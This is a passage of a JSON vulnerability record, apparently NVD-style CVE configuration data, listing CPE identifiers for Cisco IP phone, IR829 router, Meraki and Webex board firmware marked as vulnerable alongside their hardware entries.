                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8865_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8865:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829-2lte-ea-ak9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829-2lte-ea-ak9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829-2lte-ea-bk9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829-2lte-ea-bk9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829-2lte-ea-ek9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829-2lte-ea-ek9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-ck9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-ck9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-ek9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-ek9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-sk9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-sk9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-ga-zk9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-ga-zk9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-na-ak9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-na-ak9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ir829gw-lte-vz-ak9_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ir829gw-lte-vz-ak9:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_gr10_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_gr10:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_gr60_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_gr60:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr12_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr12:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr20_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr20:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr26_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr26:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr30h_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr30h:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr32_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr32:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr33_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr33:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr34_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr34:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr36_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr36:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr42_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr42:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr42e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr42e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr44_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr44:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr45_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr45:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr46_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr46:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr46e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr46e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr52_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr52:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr53_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr53:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr53e_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr53e:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr55_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr55:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr56_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr56:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr62_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr62:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr66_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr66:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr72_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr72:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr74_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr74:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr76_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr76:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr84_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr84:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mr86_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mr86:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx64w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx64w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx65w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx65w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx67cw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx67cw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx67w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx67w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx68cw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx68cw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_mx68w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_mx68w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_z3_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_z3:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:meraki_z3c_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:meraki_z3c:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_55_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_55:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_55s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_55s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_70s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_70s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_board_85s_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_board_85s:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_dx70_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:webex_dx70:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:webex_dx80_firmware:-:*:*:*:*:*:*:*",
